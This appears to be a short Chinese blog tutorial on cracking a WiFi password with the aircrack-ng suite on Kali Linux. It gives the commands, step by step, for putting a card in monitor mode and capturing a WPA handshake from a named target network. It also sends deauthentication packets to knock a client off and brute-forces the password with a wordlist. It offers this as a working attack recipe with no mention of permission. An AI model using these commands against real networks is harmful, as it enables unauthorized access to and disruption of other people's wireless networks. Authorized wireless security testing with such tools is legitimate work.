使用工具:
aircrack-ng
kali支持的无线网卡
第一步:检查无线网卡插上后,是否识别
第二步:airmon-ng check kill (我的理解是杀死有可能妨碍监听模式的进程)
第三步:airmon-ng start wlan0 把无线网卡设置为监听模式
第四步:airodump-ng wlan0mon 开启监听,确认目标,我们这里以DESKTOP-为例,
CH表示的工作的信道
第五步:对目标进行抓握手包,只要有设备重新连上这个WIFI,我们就能抓到握手包,但是一直等也不是办法,所以有了第六步
airodump-ng -c 1 -w ret --bssid A2:A4:C5:31:73:E7 wlan0mon
-c 1 表示信道1也就是目标的工作信道
-w ret 表示我们的结果将会存在ret文件里
–bssid A2:A4:C5:31:73:E7 表示目标的MAC地址
wlan0mon 表示监听的网卡
第六步:强制使设备重连WIFI
aireplay-ng -0 10 -a A2:A4:C5:31:73:E7 -c CA:D0:15:1B:A0:F6 wlan0mon
10 表示发10个攻击包
-a 表示WIFI的MAC地址
-c 表示设备的MAC地址
我们随便选一个把它强制断开WIFI,然后它会再自动连接这个WIFI
我们就能拿到握手包
这是我们拿到握手包后的截图
第七步:开始暴力破解啦
aircrack-ng -w pwd.txt ret-01.cap
-w 表示指定的字典文件
ret-01.cap 是第五步我们指定的抓到的包存放的文件名
这个破解的速度还是非常可以的!!!